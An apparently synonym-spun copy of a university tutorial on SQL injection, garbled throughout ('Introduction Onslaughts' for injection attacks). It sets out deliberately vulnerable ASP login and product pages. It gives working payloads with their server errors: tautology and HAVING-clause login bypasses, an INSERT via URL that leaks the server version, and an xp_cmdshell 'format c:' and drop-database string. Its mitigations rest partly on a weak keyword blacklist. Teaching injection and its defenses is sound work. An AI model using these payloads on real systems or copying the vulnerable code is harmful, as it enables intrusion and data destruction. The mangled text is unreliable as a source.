1
Tutorial on SQL Introduction Onslaughts
Nicole Duff and Huiming Yu
Department of Computer Investigation
North Carolina A&T State University
1. Introduction
Structured Inquiry Talk (SQL) is a computer talk planned to interinfluence with relational
databases. The most low contrive of project reformions a inquiry, which is a assemblage of statements
that usually give-back a uncompounded ‘effect established’. SQL statements accept the ability to fluctuate the composition of
databases and reformion the immeasurableness of those axiomsbases [1, 3, 4, 6]. This can jeopardize the
integrity of a rule.
A trutination SQL inquiry is victorious of uncompounded or over SQL ordains, such as SELECT,
UPDATE, or INSERT. SQL introduction is uncompounded of the most low impression flake onslaughts.
According to NIST SQL introduction amounted to 14% of the entirety extracture impression vulnerabilities
in 2006 [2]. SQL introduction is the influence of latter a SQL inquiry or ordain as input into a extracture
application. It exploits extracture impressions that reformion client-side axioms in a SQL inquiry externally special
input sufficientation. SQL introduction onslaughts usually tarachieve axioms residing in a axiomsbase.
2. SQL Introduction Onslaughts
A SQL introduction onslaught occurs on axiomsbase-driven extracturesites when unacknowledged SQL queries are
executed on assailable predicaments. This onslaught can bypass a firewentire and can impel a very-much patched
system. Restraint this to befortuity mien 80, the lapse extracture mien, is the simply fiction exactd. SQL
introduction onslaughts tarachieve a restricted extracture impression where the defencelessness of the relational
database is either perceive or discovered by the onslaughter. Figure 1 shows a SQL onslaught
methodology [4].
Figure 1: Onslaught Modeology
2
In this copy students achieve be disconnected into indivisible groups and they achieve income to
assigning roles. Some students achieve mienray the role as the extracture impression developer and others
achieve mienray the role as the onslaughter. The developers achieve constitute an impression that includes a
relational axiomsbase. The onslaughters achieve gauge to chop the impression. This condition con-over reformions the
examples familiar by Mitchell Horper to entireow students achieve hands-on test [3].
2.1 Constitute a HTML contrive
In this exception how to constitute a elementary login contrive determined frmLogin achieve be picturesque.

Username:
Password:

When this contrive is proposeted, the reformionrspectry and password are passed to the login.asp script. They
are adapted to the script through the Request.Contrive assemblage. A reformionr achieve be authorized by
providing reform reformionr spectry and password. The log in arrangement is duncompounded by structure a SQL inquiry
and comparing the reformionr spectry and password to the login chronicles in the axiomsbase.
Allow us transcribe the login.asp script:
<%
dim reformionrName, password, inquiry
dim conn, rS
userSpectry = Request.Form(“userName”)
password = Request.Form(“password”)
established conn = server.createObject(“ADODB.Connection”) /*amalgamate to the axiomsbase
established rs = server.createObject(“ADODB.Recordset”)
inquiry = “excellent estimate(*) from reformionrs where reformionrName=” ‘ & reformionrSpectry & ‘ ” and
userPass='” & password & ” ‘ ” /* inquiry commnad
conn.Disclosed “Provider=SQLOLEDB; Axioms Spring=(local);
Initial Catalog=myDB; Reformionr Id=sa; Password=”
rs.activeConnection = conn
rs.disclosed inquiry
if referable rs.eof then /* hinder login counsel
response.transcribe “Logged In”
else reply.transcribe “Bad Credentials”
object if
%>
3
If the reformionr spectry and password equality a proceedings in the axiomsbase, “Logged In” achieve be displayed.
Otherwise, “Bad Credentials” achieve be displayed.
2.2. How a SQL Introduction Works
In unconcealed Extracture impressions reformion axioms unravel from a client to frame SQL queries. This can lead
to defencelessness where an onslaughter can enstrike SQL queries to cacorrection SQL introduction onslaughts.
Separate SQL introduction onslaughts such as manipulating the immeasurableness of a inquiry ordain, restraintcing
login and fluctuate counsel in a axiomsbase achieve be discussed in this exception.
 Constitute a axiomsbase
Allow us constitute a axiomsbase myDB that includes reformionr spectry and password counsel in a reformionrs compensation
with some dummy chronicles:
constitute axiomsbase myDB
go
correction myDB
go
constitute compensation reformionrs
(
userId int individuality(1,1) referable void,
userSpectry varchar(50) referable void,
userPass varchar(20) referable void
)
insinuate into reformionrs(userName, reformionrPass) treasures(‘john’, ‘doe’)
insinuate into reformionrs(userName, reformionrPass) treasures(‘admin’, ‘wwz04ff’)
insinuate into reformionrs(userName, reformionrPass) treasures(‘fsmith’, ‘mypassword’)
If a reformionr tries to login and cater the reformionrspectry of john and password of doe, the intimation
“Logged In” achieve be displayed. The inquiry would look love:
excellent estimate(*) from reformionrs where reformionrName=’john’ and reformionrPass=’doe’
 SQL Introduction: Reformion the Immeasurableness of a Inquiry
A choper can reformion the immeasurableness of a inquiry to constitute a SQL introduction onslaught. Restraint copy
Fluctuate the reformionrPass into ‘ ‘ or 1=1 –‘ to constitute a excellent ordain love this:
excellent estimate(*) from reformionrs where reformionrName=’john’ and reformionrPass=’ ‘
or 1=1 –‘
Therefore the inquiry simply hinders restraint the reformionrspectry of john. Instead of hindering restraint a equalitying
password, it hinders restraint an immeasurableness password, or the impeded equation of 1=1. In this condition if the
password opportunity is immeasurableness or 1 equals 1(which is regularly gentleman), a sufficient degree achieve be plant in the
users compensation with reformionrspectry john. The uncompounded verse delimeter (–) that comments quenched the definite quote
4
stops ASP give-backing an falsity abquenched any undisguised quotations. As the effect uncompounded degree achieve be
returned and the intimation “Logged In” achieve be displayed.
This mode can be reformiond restraint the reformionrspectry opportunity. If changing the reformionrspectry is ‘ or 1=1 — and
password is immeasurableness such as:
Username: ‘ or 1=1 —
Password: [Empty]
And enstrike a excellent inquiry:
excellent estimate(*) from reformionrs where reformionrName=’ ‘ or 1=1 –‘ and reformionrPass=’ ‘
A estimate of entire degrees in the reformionrs compensation achieve be give-back. This is an copy of SQL introduction onslaught
that is implemented by adding ordain that reformions the immeasurableness of a inquiry to achieve an undesired
result.
 SQL Introduction: Restraintce Login
The aftercited copy demonstrates how restraintce login SQL introduction works. Consider the
aftercited inquiry that is fixed on the reformionrs compensation.
excellent reformionrSpectry from reformionrs where reformionrName=’ ‘ having 1=1
A page centire login.asp can very-much be familiar to inquiry the axiomsbase by using these login
credentials:
Username: ‘ having 1=1 —
Password: [Anything]
When a reformionr clicks on the propose trifle to established-on-foot the login arrangement, the SQL inquiry recitals ASP to
sobject the aftercited falsity intimation to the browser:
Microsoft OLE DB Caterr restraint SQL Server (0x80040E14)
Column ‘users.userName’ is insufficient in the excellent roll becacorrection it is referable contained in an aggregate
office and there is no GROUP BY condition.
/login.asp, verse 16
This falsity intimation tells the unacknowledged reformionr the spectry of uncompounded opportunity from the axiomsbase:
users.userName. Using the spectry of this opportunity, a reformionr can reformion SQL Server’s LIKE keyword to
login with the aftercited credentials:
Username: ‘ or reformionrs.userSpectry love ‘a%’ —
Password: [Anything]
Once frequently, this achieves an injected SQL inquiry frequentlyst the reformionrs compensation:
excellent reformionrSpectry from reformionrs where reformionrName=’ ‘ or
users.userSpectry love ‘a%’ –‘ and reformionrPass=’ ‘
5
When the reformionrs compensation was constituted, a reformionr whose reformionrSpectry opportunity was admin and reformionrPass opportunity
was wwz04ff was as-courteous constituted. Logging in with the reformionrspectry and password shown over reformions
SQL’s love keyword to achieve the reformionrname. The inquiry grabs the reformionrSpectry opportunity of the leading degree
whose reformionrSpectry opportunity established-on-foots with a, which in this condition is admin:
Logged In As admin
* SQL Introduction: Fluctuate the Content of a Axiomsbase
Allow us constitute a issues compensation and degrees on the SQL server as aftercited:
constitute compensation issues
(
id int individuality(1,1) referable void,
prodSpectry varchar(50) referable void,
)
insinuate into issues(prodName) treasures(‘Pink Hoola Hoop’)
insinuate into issues(prodName) treasures(‘Green Soccer Ball’)
insinuate into issues(prodName) treasures(‘Orange Rocking Chair’)
Allow us constitute a issues.asp ASP script as follows:
<%
dim prodId
prodId = Request.QueryString(“productId”)
established conn = server.createObject(“ADODB.Connection”) /* amalgamate to axiomsbase
established rs = server.createObject(“ADODB.Recordset”)
inquiry = “excellent prodSpectry from issues where id = ” & prodId /* excellent a issue
conn.Disclosed “Provider=SQLOLEDB; Axioms Spring=(local);
Initial Catalog=myDB; Reformionr Id=sa; Password=”
rs.activeConnection = conn
rs.disclosed inquiry
if referable rs.eof then
response.transcribe “Got issue ” & rs.fields(“prodName”).value
else reply.transcribe “No issue plant”
object if
%>
Mark issues.asp in the browser with the aftercited URL:
http://localhost/products.asp?productId=1
6
The aftercited verse of extrstrike in the browser is displayed:
Got issue Pink Hoola Hoop
Notice issue.asp give-backs a opportunity from the chronicleestablished fixed on the opportunity’s spectry:
response.transcribe “Got issue” & rs.fields(“prodName”).value
Although this may look over close it is referable. By manipulating the axiomsbase a SQL introduction can
occur becacorrection the WHERE clacorrection of the inquiry is fixed on a numerical treasure:
inquiry = “excellent prodSpectry from issues where id = ” & prodId
The issues.asp page exacts a numerical issue Id passed as the issueId inquirystring
variable.
Consider the aftercited URL to issues.asp:
http://localhost/products.asp?productId=0%20or%201=1
Each %20 in the URL represents a URL-encoded immeasurableness class, so the URL looks love:
http://localhost/products.asp?productId=0 or 1=1
When reformiond in observation with issues.asp, the inquiry looks love:
excellent prodSpectry from issues where id = 0 or 1=1
From the over excellent ordain we perceive how to reformion some URL-encoding, the spectrys of the
products can be pulled from the issue compensation with the aftercited url:
http://localhost/products.asp?productId=0%20having%201=1
This would originate the aftercited falsity in the browser:
Microsoft OLE DB Caterr restraint SQL Server (0x80040E14)
Column ‘products.prodName’ is insufficient in the excellent roll becacorrection it is referable contained in an
aggregate office and there is no GROUP BY condition.
/products.asp, verse 13
Take the spectry of the issues opportunity (products.prodName) and centire up the aftercited URL in the
browser:
http://localhost/products.asp?productId=0;insert%20into%20products
(prodName)%20values(left(@@version,50))
Here is the inquiry externally the URL-encoded immeasurablenesss:
http://localhost/products.asp?productId=0;insinuate into
products(prodName) treasures(left(@@version,50))
It give-backs “No issue plant”. However it as-courteous runs an INSERT inquiry on the issues compensation,
adding the leading 50 classs of SQL server’s @@statement wavering (which contains the details of
SQL Server’s statement, found, expectation.) as a innovating proceedings in the issues compensation.
7
To achieve to the SQL server’s statement, a reformionr must centire up the issues.asp page with the treasure of
the extreme engauge in the issues compensation such as:
http://localhost/products.asp?productId=(select%20max(id)
%20from%20products)
This inquiry takes the ID of the extreme degree adventitious to the issues compensation using SQL server’s MAX
function. The quenchedput is the innovating degree that contains the SQL server statement details:
Got issue Microsoft SQL Server 2000 – 8.00.534 (Intel X86)
This mode of introduction can be reformiond to percontrive dense tasks.
3. A Real World SQL introduction onslaught
In May 2008 China and Taiwan were touch by a great SQL introduction onslaught that insinuateed malware in
thousands of extracturesites [5]. On May 13, the onslaught was detected as originating from a server from
in China. The onslaughters made no exertion to disguise the spring IP oration. Many dupe extracturesites
were bankrupt becacorrection they sustained lots of beaming fluctuates from the SQL introduction onslaughts.
Thousands of extracturesites were touch and most of them were in China.
The chopers reformiond automated queries through Google’s pursuit engine to test assailable
websites. The onslaughters reformiond automated queries to Google Inc’s pursuit engine to test Extracture
sites assailable to the onslaught. The onslaught reformions SQL introduction to pollute extracturesites with malware,
which exploits vulnerabilities in the browsers of those who mark the predicaments. The malware came
from 1,000 unanalogous servers and targeted 10 vulnerabilities in Internet Explorer and totalied plugins that are widespread in Asia [5]. The Mackay Memorial Hospital had a screenshot that shows that
the statement of the predicament had been impeled and displayed the SQL exasperate injected by the onslaught.
The great companies Extracture predicaments such as SouFun.com, Mycar168.com in China accept been
affected.
The impinfluence was on a great-scale. There were thousands of dupe extracturesites that had no advantage.
Many indivisibles had to ascertain other ways to do their trade.
4. Intercepting SQL Introduction Onslaughts
If a software developer designs scripts and impressions with guard compensation most of SQL
introduction onslaughts can be avoided. In the aftercited exception separate modes that software
developers can reformion to impoverish extracture impressions defencelessness restraint SQL introduction onslaughts achieve be
discussed [3].
Mode 1: Limit Reformionr Access
The lapse rule acestimate restraint SQL server 2000 should never be reformiond becacorrection of its unrestricted
nature. Establishedting up recitals restraint restricted purposes is regularly a cheerful proposal. Restraint copy, if a
database entireows reformionrs aim and ordain issues, then the conductor must established up an acestimate wheedleed
webUser_public that has SELECT hues on the issues compensation, and INSERT hues simply on the
orders compensation.
8
If a reformionr does referable imagine reformion of liberal stored procedures, or has unused triggers, stored
procedures, reformionr-defined offices, expectation, then carry them, or impel them to an plain server.
SQL introduction onslaughts imagine reformion of liberal stored procedures such as xp_cmdshell and
xp_grantlogin. Removing them can bung the onslaught anteriorly it occurs.
Mode 2: Escape Quotes
SQL introduction onslaughts exstrike the reformionr of uncompounded quotes to limit an computeenance. The controltuity of
an SQL introduction onslaught can be impoverishd by using a elementary supply office and converting entire
uncompounded quotes to brace uncompounded quotes. Using ASP to constitute a collective supply office achieve manage the
uncompounded quotes automatically. See the aftercited copy:
<%
office stripQuotes(strWords)
stripQuotes = supply(strWords, ” ‘ “, ” ‘ ‘ “)
object office
%>
If the stripQuotes office is reformiond in observation with the leading inquiry then it achieve fluctuate from
the aftercited excellent inquiry:
excellent estimate(*) from reformionrs where reformionrName=’john’ and
userPass=’ ‘ or 1=1 –‘
into the aftercited excellent inquiry:
excellent estimate(*) from reformionrs where reformionrName=’john” and
userPass=’ ‘ ‘ or 1=1 –‘
This can bung the SQL introduction onslaught becacorrection the clacorrection restraint the WHERE inquiry now exacts
both the reformionrSpectry and reformionrPass opportunitys to be sufficient.
Mode 3: Carry Culprit Classs/Class Sequences
Certain classs and class sequences such as ; , –, excellent, insinuate and xp_ can be reformiond to
percontrive an SQL introduction onslaught. Removing these classs and class sequences from reformionr
input can impoverish the controltuity of an introduction onslaught occurring.
The aftercited ordain demonstrates a basic office can manage entire of this:
<%
office killChars(strWords)
dim badChars
dim innovatingChars
badChars = dress (“select”, “drop”, “;”, “–“, “insert”,
“delete”, “xp_”)
newChars = strWords
9
restraint i = 0 to uBound(badChars)
newChars = supply(newChars, badChars(i), “”)
next
killChars = innovatingChars
object office
%>
Using stripQuotes in concert with killChars very-much carrys the controltuity of any SQL
introduction onslaught from latter. Look at the excellent inquiry in the aftercited:
excellent prodSpectry from issues where id=1; xp_cmdshell ‘format
c: /q /yes ‘; ooze axiomsbase myDB; —
Ran through stripQuotes and then killChars, would object up looking love this:
prodSpectry from issues where id=1 cmdshell ‘ ‘format c:
/q /yes ” axiomsbase myDB
As the effect it achieve give-back no chronicles from the inquiry.
5. Conclusion
SQL introduction is uncompounded of low impression flake threats. It is the influence of latter a SQL inquiry or
ordain as input into a extracture impression and exploits the extracture impression that reformions client-side
axioms in a SQL inquiry externally special input sufficientation.
SQL introduction is a question taught in the computer investigation curriculum. The SQL introduction onslaughts
condition con-over representative has been familiar to succor instructors train SQL introduction onslaughts and succor
students imbibe the uncertain SQL introduction onslaughts as courteous as the ways to intercept these onslaughts. By
using exercises students achieve achieve hands-on test of how SQL introduction works and as-courteous ways
to engagement them.
References
[1] Anley, C., “Advanced SQL Introduction In SQL Server Impressions”. NGSSoftware Insight
Guard Repursuit (NISR) proclamation, 2002.
http://www.nextgenss.com/papers/advanced_sql_injection.pdf.
[2] Dysart, F. and Sherriff, M., “Automated Fix Generator restraint SQL Introduction Onslaughts”, In
Proceedings of the 19th International Symposium on Software Reliability Engineering,
Charlotteville, 2008.
[3] Harper, M., “SQL Introduction Onslaughts – Are You Safe?”, http://www.sitepoint.com/print/794,
June 17, 2002.
[4] Indian Computer Emergency Reply Team. CASE STUDY: Extracturepredicament Compromise and
Launch of Further Onslaughts by Exploiting SQL Introduction Defencelessness. http://www.certin.org.in/knowledgebase/whitepapers/CICS-2008-02.pdf
[5] Lemon, S., “Mass SQL Introduction Onslaught Touchs Chinese Extracture Predicaments”, 2008,
10
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=90866
58
[6] Wei, K., Muthuprasanna, M. and Kothari, S., “Preventing SQL Introduction Onslaughts in Stored
Procedure”, IEEE ASWEC, April 2006.

~~~For this or similar assignment papers~~~